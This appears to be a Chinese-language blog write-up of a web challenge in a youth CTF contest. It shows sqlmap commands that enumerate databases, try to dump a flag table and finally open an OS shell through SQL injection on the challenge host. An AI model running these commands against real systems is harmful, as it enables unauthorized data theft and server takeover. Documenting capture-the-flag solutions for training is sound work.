青少年CTF

web

文章管理系统

这个是一个sql注入

0x00

使用的知识点

sql 注入

0x01

image-20240229221646951

image-20240229221714442

出现id

0x02

爆破数据库

1
python sqlmap.py  -u  http://challenge.qsnctf.com:32112?id=1 --dbs

image-20240229221930773

发现ctftraining

1
python sqlmap.py  -u  http://challenge.qsnctf.com:32112?id=1 -D --tables

image-20240229222237820

1
python sqlmap.py  -u  http://challenge.qsnctf.com:32112?id=1 -D ctftraining -T FLAG_TABLE --COLUMNS --dump --batch

image-20240229222308201

啥也没有

翻遍了整个库都没有发现

尝试连接webshell

1
python sqlmap.py  -u  http://challenge.qsnctf.com:32112?id=1 --os-shell

image-20240229222411385

image-20240229222425542

image-20240229222448130

image-20240229222500424

总结

  1. web 的所有题都做了,但是剩下的三道比较简单,所以没有记录

    记录这个主要是使用sqlmap 连接shell 的方式

#CTF比赛记录
青少年CTF
https://tsy244.github.io/2024/02/29/CTF比赛记录/青少年CTF/
Author
August Rosenberg
Posted on
February 29, 2024
Licensed under